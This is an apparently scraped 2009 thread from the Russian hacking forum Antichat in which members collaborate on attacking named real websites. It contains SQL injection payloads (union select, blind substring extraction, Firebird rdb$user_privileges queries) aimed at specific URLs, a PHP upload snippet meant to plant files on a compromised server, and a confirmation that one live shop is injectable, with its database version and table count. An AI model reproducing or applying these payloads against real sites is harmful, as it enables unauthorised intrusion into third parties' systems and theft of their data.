Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
10.02.2009, 20:23
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
Провел на форуме:
14023893
Репутация:
2163
|
|
downloader,
1. это nix? which wget GET curl lynx ? попробуй через аплоад:
<form enctype=multipart/form-data method=post><input type=file name=x><input type=submit></form><?$f=$_FILES[x];copy($f[tmp_name],$f[name]);?>
2. ковычка там не нужна и колонки в запросе две
Gorev, обе переменные участвуют в нескольких запросах поэтому связка с union там врятли прокатит, вообще говоря, т.к. колонка в одном из запросов одна выглядело бы примерно так -1+union+select+cast(user+as+char(n))+from+rdb$user _privileges/* причем тип данных (as char/int/etc(n)) должен совпадать с изначальным в первой выборке, если посимвольным брутом надо покапаться в мануалах найти функцию которая работает с выражениями/строками, особо не вдавался в этот вопрос
/add посмотрел пока писал сообщение посимвольно будет выглядеть примерно так:
+and+substring((select+rdb$user+from+rdb$user_priv ileges+здесь_какой_нибудь_подд ерживаемый_лимит(например rows))+from+1+for+0)='a'/*
все с точностью прочитанного нескольками минутами назад мануала, надо бы поставить, посмотреть может наврал где-то 
|
|
|
10.02.2009, 21:00
|
|
Reservists Of Antichat - Level 6
Регистрация: 04.02.2007
Сообщений: 1,152
Провел на форуме:
3008839
Репутация:
1502
|
|
Gorev, ну и ещё - тебе надо умудриться не только подобрать количество колонок в union, но и их типы) ибо из мануала
<...>Firebird is very strict with datatypes, and when you have different datatype in queries that make up the UNION it throws an error. It can happen even if difference is something trivial like CHAR(5) vs CHAR(6). It also happens for decimal and double datatypes, and (one of the most annoying) when you put NULL or zero.
Firebird 2 has much better type coercion as it detects the largest datatype, and allows smaller ones to fit automatically, i.e. if you have CHAR(5) in one query and CHAR(6) in other, it will automatically set view's column to be CHAR(6). Please note that datatypes have to be compatible for this to work (for example, you cannot union a Blob and Decimal column).
__________________
Bedankt euch dafür bei euch selbst.
H_2(S^3/((z1, z2)~(exp(2pi*i/p)z1, exp(2pi*q*i/p)z2)))=Z/pZ
|
|
|
|
10.02.2009, 22:13
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161
Репутация:
142
|
|
http://www.np-ats.ru/index.jsp?pid=612'+order+by+1--
Такая же хня,скуля там есть.
|
|
|
|
10.02.2009, 22:31
|
|
Новичок
Регистрация: 12.09.2008
Сообщений: 13
Провел на форуме:
170978
Репутация:
1
|
|
Сообщение от l1ght
downloader,
1. это nix? which wget GET curl lynx ? попробуй через аплоад:
Код:
<form enctype=multipart/form-data method=post><input type=file name=x><input type=submit></form><?$f=$_FILES[x];copy($f[tmp_name],$f[name]);?>
freeBSD 6.2
sorry но не понял как делать через аплоад  я ещё навичок в этом деле 
Последний раз редактировалось downloader; 10.02.2009 в 22:41..
|
|
|
|
10.02.2009, 23:18
|
|
Познающий
Регистрация: 24.12.2008
Сообщений: 54
Провел на форуме:
253038
Репутация:
9
|
|
http://dl.kimep.kz/course/view.php?id=-114
Не могу найти скулю, помогите плз...
|
|
|
|
10.02.2009, 23:25
|
|
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
Провел на форуме:
1325167
Репутация:
100
|
|
Включена фильтрация кавычек, вряд скули там будут.
|
|
|
|
10.02.2009, 23:45
|
|
Познающий
Регистрация: 24.12.2008
Сообщений: 54
Провел на форуме:
253038
Репутация:
9
|
|
Сообщение от Ershik
Включена фильтрация кавычек, вряд скули там будут.
что можешь посоветовать?
|
|
|
|
11.02.2009, 05:30
|
|
Участник форума
Регистрация: 16.11.2006
Сообщений: 230
Провел на форуме:
599789
Репутация:
227
|
|
искать уязвимости. что ещё советовать-то?) Инъекции в ом параметре нет
|
|
|
|
11.02.2009, 05:50
|
|
Познающий
Регистрация: 21.01.2009
Сообщений: 98
Провел на форуме:
227123
Репутация:
122
|
|
где тут вывод???
http://eromarket.com.ua/index.php?productID=-99999%20union%20select%20version()/*
|
|
|
|
11.02.2009, 06:07
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
Забавная у тебя там инъекция, без минуса если:
Код:
http://eromarket.com.ua/index.php?productID=99999
Извините, запрашиваемый документ не был найден на сервере
Код:
http://eromarket.com.ua/index.php?categoryID=15+and+substring(version(),1,1)=5
5 ветка, похоже слепая, принтабельных колонок или в исходниках ничего не увидел
ан нет, именно в исходниках вывод и есть
5.0.45-log
Код:
http://eromarket.com.ua/index.php?categoryID=15+union+select+version()/*
<meta name="Description" content="Секс-шоп - EROmarket - Интернет-магазин, секс, sex, sex-shop, sexshop, интим,секс шоп, нижнее белье, эротические, эротические, белье, магазины, товары, духи, эро, bdsm, ero, эротика, возбудитель Разное Tongue Tingler Vibro E-Z Rider 5.0.45-log, Ukraine, Украина, Kiev, Киев">
80 таблиц. Успехов. File_priv нету
Последний раз редактировалось Pashkela; 11.02.2009 в 06:21..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
